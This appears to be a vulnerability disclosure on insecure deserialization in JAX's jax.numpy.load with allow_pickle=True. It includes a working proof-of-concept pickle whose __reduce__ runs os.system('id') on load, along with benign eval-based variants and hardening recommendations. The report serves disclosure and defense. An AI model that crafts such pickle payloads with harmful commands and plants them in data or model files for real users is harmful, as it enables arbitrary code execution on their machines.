Arbitrary Code Execution in jax.numpy.load via Insecure Deserialization
Summary
The jax.numpy.load function in the JAX library can execute arbitrary code when it loads a maliciously crafted file while the allow_pickle parameter is set to True. jax.numpy.load is a thin wrapper around numpy.load, which deserializes pickled data with Python's pickle module when allow_pickle=True, and unpickling untrusted data is inherently unsafe.
Vulnerability Details
- Component: jax.numpy.load
- File: jax/_src/numpy/lax_numpy.py
- Vulnerability Type: Insecure Deserialization (CWE-502)
- Impact: Arbitrary Code Execution (ACE)
The implementation of jax.numpy.load is as follows:
    @export
    def load(file: IO[bytes] | str | os.PathLike[Any], *args: Any, **kwargs: Any) -> Array:
      # ... (docstring)
      out = np.load(file, *args, **kwargs)
      # ... (post-processing)
      return out
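Because jax.numpy.load forwards *args and **kwargs to np.load unchanged, a caller who passes allow_pickle=True enables NumPy's pickle code path: if the file does not start with the .npy or .npz (zip) signature, np.load falls back to pickle.load, and object arrays stored in .npy or .npz files are likewise unpickled. NumPy's default is allow_pickle=False, so the caller must opt in explicitly. An attacker can supply a crafted file whose pickled payload executes arbitrary system commands as soon as it is unpickled. This happens inside the np.load call, before any of JAX's post-processing runs.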
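Unpickling is not passive parsing: pickle calls whatever callable an object's __reduce__ method names, with the arguments it supplies. The minimal, benign sketch below uses only the standard library to show this without any NumPy or JAX involvement; the Payload class and the eval expression are illustrative stand-ins for the report's Malicious class and os.system('id').

```python
import pickle


class Payload:
    """Benign, illustrative stand-in for the PoC's Malicious class."""

    def __reduce__(self):
        # pickle records (callable, args); the loader later calls callable(*args).
        # Using the builtin eval means that loading the data evaluates code.
        return (eval, ("6 * 7",))


# Serialize: only a reference to builtins.eval and its argument are stored,
# not the Payload class itself.
blob = pickle.dumps(Payload())

# Deserialize: eval("6 * 7") runs as a side effect of loading.
result = pickle.loads(blob)
print(result)  # 42
```

The loader never needs the Payload class to exist; the stream alone names the callable, which is why any file that reaches pickle.load can run code of the attacker's choosing.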
Proof of Concept (PoC)
Steps to Reproduce:
- Create a malicious .npy file using the following script (despite the extension, the file contains a raw pickle stream rather than NPY-format data):
    import os
    import pickle

    class Malicious:
        def __reduce__(self):
            # When unpickled, pickle calls os.system('id')
            return (os.system, ('id',))

    with open('malicious.npy', 'wb') as f:
        pickle.dump(Malicious(), f)
- Load the malicious file using jax.numpy.load with allow_pickle=True:
    import jax.numpy as jnp
    jnp.load('malicious.npy', allow_pickle=True)
- Observe that the id command runs and prints the current user and group IDs.
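Because jax.numpy.load passes its arguments straight through to np.load, the reproduction above can also be sketched as a self-checking script against NumPy alone. This is an illustrative variant, not part of the original report: it assumes only that NumPy is installed, swaps os.system('id') for a harmless eval call, and checks both that the default allow_pickle=False rejects the file and that allow_pickle=True runs the payload.

```python
import os
import pickle
import tempfile

import numpy as np


class Payload:
    """Benign, illustrative stand-in for the PoC's Malicious class."""

    def __reduce__(self):
        # On load, pickle calls eval("'payload ran'") instead of os.system('id').
        return (eval, ("'payload ran'",))


# Write a raw pickle stream under an .npy name, as the PoC does.
fd, path = tempfile.mkstemp(suffix=".npy")
with os.fdopen(fd, "wb") as f:
    pickle.dump(Payload(), f)

try:
    # Default allow_pickle=False: NumPy refuses to unpickle and raises ValueError.
    try:
        np.load(path)
        refused = False
    except ValueError:
        refused = True

    # Explicit opt-in: the payload's callable runs inside np.load.
    loaded = np.load(path, allow_pickle=True)
finally:
    os.remove(path)

print(refused, loaded)  # True payload ran
```

Substituting jnp.load for np.load should behave the same way, since the payload runs inside the forwarded np.load call; that is an inference from the wrapper shown earlier rather than something this sketch tests.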
Impact
An attacker can distribute malicious model or data files in .npy format. If a user is persuaded to load such a file with jax.numpy.load(..., allow_pickle=True), the attacker's payload runs arbitrary code with the privileges of the Python process that loads it, giving the attacker full control over the user's account and data.
Recommendations
- Deprecate or restrict allow_pickle: Discourage the use of allow_pickle=True in jax.numpy.load.
- Documentation warning: Add a prominent security warning to the jax.numpy.load docstring, similar to the one in numpy.load.
- Safe alternatives: Encourage users to use safer serialization formats such as safetensors or msgpack (as used in Flax/Orbax).
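The first two recommendations could be combined into a small guard. The sketch below is hypothetical: load_restricted is an illustrative name, not an existing JAX or NumPy function, and warning rather than raising is only one possible design (a real deprecation might use DeprecationWarning or reject the flag outright). It makes allow_pickle keyword-only, keeps NumPy's safe default, and warns whenever pickling is enabled.

```python
import io
import warnings

import numpy as np


def load_restricted(file, *, allow_pickle=False, **kwargs):
    """Hypothetical hardened wrapper around np.load (not a JAX or NumPy API).

    Pickle-based loading remains possible, but it must be requested as an
    explicit keyword, and doing so always emits a warning naming the risk.
    """
    if allow_pickle:
        warnings.warn(
            "allow_pickle=True lets the file execute arbitrary code during "
            "loading; only use it with fully trusted data.",
            UserWarning,
            stacklevel=2,
        )
    return np.load(file, allow_pickle=allow_pickle, **kwargs)


# Usage: plain numeric arrays round-trip without any pickling.
buf = io.BytesIO()
np.save(buf, np.arange(4, dtype=np.float32))
buf.seek(0)
arr = load_restricted(buf)
print(arr)  # [0. 1. 2. 3.]
```

Warning instead of raising keeps existing trusted workflows running while making the risk visible; a stricter variant could refuse allow_pickle=True unless a second, explicit opt-in is supplied.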